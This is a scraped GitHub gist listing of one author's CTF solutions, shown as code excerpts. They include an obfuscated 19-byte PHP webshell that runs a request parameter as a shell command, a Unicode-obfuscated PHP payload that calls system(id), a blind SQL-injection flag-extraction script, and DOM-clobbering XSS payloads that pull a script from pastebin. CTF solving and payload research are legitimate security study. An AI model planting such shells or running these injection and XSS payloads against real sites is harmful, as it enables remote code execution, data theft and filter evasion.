Skip to content

Instantly share code, notes, and snippets.

View terjanq's full-sized avatar

terjanq

876 followers · 10 following
View GitHub Profile
@terjanq
terjanq / scriptless_solve.html
Last active June 13, 2020 19:30
Solution to Scriptless challenge from Pwn2win 2020 CTF
<body>
</body>
<script>
/*
Quasi-scriptless (3 solves)
@terjanq
terjanq / rev_shell.php
Last active December 27, 2024 14:54
The shortest non-alphanumeric reverse shell script (19 bytes)
<?=`{${~"\xa0\xb8\xba\xab"}["\xa0"]}`;
/*
* In terminal:
* $ echo -ne '<?=`{${~\xa0\xb8\xba\xab}[\xa0]}`;' > rev_shell.php
* This is how the code will be produced, \xa0\xb8\xba\xab will be
* treated as constant therefore no " needed. It is also not copyable
* string because of non-ascii characters
*
* Explanation:
@terjanq
terjanq / funny.php
Last active August 19, 2024 04:03
PHPF*ck
/* system(id) */
<?=$Φ=([].Φ)[![]+![]+![]]?><?=$Χ=++$Φ?><?=$Ψ=++$Χ?><?=$Ω=++$Ψ?><?=$Ϊ=++$Ω?><?=$Ϋ=++$Ϊ?><?=$ά=++$Ϋ?><?=$έ=++$ά?><?=$ή=++$έ?><?=$ί=++$ή?><?=$ΰ=++$ί?><?=$α=++$ΰ?><?=$β=++$α?><?=$γ=++$β?><?=$δ=++$γ?><?=$ε=++$δ?><?=$ζ=++$ε?><?=$η=++$ζ?><?=$θ=++$η?><?=$ι=++$θ?><?=$κ=++$ι?><?=$λ=++$κ?><?=$μ=++$λ?><?=$ν=++$μ?><?=$ξ=++$ν?><?=$ο=++$ξ?><?=$ο=([].Φ)[![]+![]+![]]?><?=($η.$ν.$η.$θ.$Ω.$α)($έ.$Ψ)?>
<!--
Explanation:
- Some of the characters might look like alphanumeric, but they are Unicode characters.
- 'ArrayΦ' <-> [].Φ
- 1 <-> ![]
- 'a' <-> ([].Φ)[![]+![]+![]]
@terjanq
terjanq / part1.py
Last active April 20, 2020 18:21
Stegasaurus Ccratch solution (PlaidCTF 2020)
# The solution comes from the paper https://sci-hub.tw/10.1007/BF03025305
# Which I got from p4 team.
import random
from math import factorial
SET_SIZE = 8
MAX_VAL = 40000
# get random 8 integers
@terjanq
terjanq / writeupBin_for_bots.py
Created December 29, 2019 20:24
Payload to WriteupBin hxp2019 CTF
from flask import Flask
import time
import requests
import os
import re
import sys
app = Flask(__name__)
@terjanq
terjanq / car_repair.js
Created October 24, 2019 12:15
Solutions from hacklu 2019 CTF
/*
* This is a solution to "Car repair shop" challenge from hack.lu ctf 2019
* Solves: 9
* 10/23/2019 © by terjanq
*/
/* The idea of the solution is: */
function WoW(){ this.Oo = 'O.o'; }
var x = new WoW();
@terjanq
terjanq / exploit.js
Last active January 12, 2025 18:10
This is a solution of Oracle v2 and Oracle v1 from https://nn9ed.ka0labs.org/challenges#x-oracle%20v2 (I realized I could use <meta> and redirect admin to my website and run the challenge in iframes after I already solved it with bruteforcing the admin :p)
const fetch = require('node-fetch');
var flag = 'nn9ed{'
var alph = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!().{}'
var escape = d => d.replace(/\\/g, '\\\\').replace(/\./g, '\\.').replace(/\(/g, '\\(').replace(/\)/g, '\\)').replace(/\{/g, '\\{').replace(/\}/g, '\\}');
var make_payload = (i, o) => `Season 6%' AND 1=IF(ORD(SUBSTR(flag,${i},1))=${o},1,EXP(44444)) #` // throws an exception if the character of flag is incorrect
const base_url = 'http://x-oracle-v2.nn9ed.ka0labs.org/'
// Generates definitions for fonts
function generateFonts() {
@terjanq
terjanq / solution-225.html
Last active September 25, 2019 10:25
XSS Challenge DOM Clobbering
<!-- 225 char solution (remove new lines) -->
<a href=//pastebin.com/how-can-i-escape-this%2f..%2fraw/LiE18yqs? id=testPath name=protocol>
<form id=CONFIG>
<img id=testPath name=test>
@terjanq
terjanq / solution-214.html
Created September 23, 2019 20:38
XSS Challenge DOM Clobbering
<!-- Solution 214 - with a strange behaviour in browsers (remove new lines) -->
<a href=//pastebin.com/how-can-i-escape-this%2f..%2fraw/LiE18yqs? id=testPath name=protocol>
<form id=CONFIG>
<img id=test>
<a>
@terjanq
terjanq / solution-212.html
Last active September 24, 2019 13:36
XSS Challenge DOM Clobbering
<!-- Solution 212! (remove new lines) -->
<a id=CONFIG name=test>
<p>
<a href=//pastebin.com/how-can-i-escape-this%2f..%2fraw/LiE18yqs? id=testPath name=protocol>
<p>
T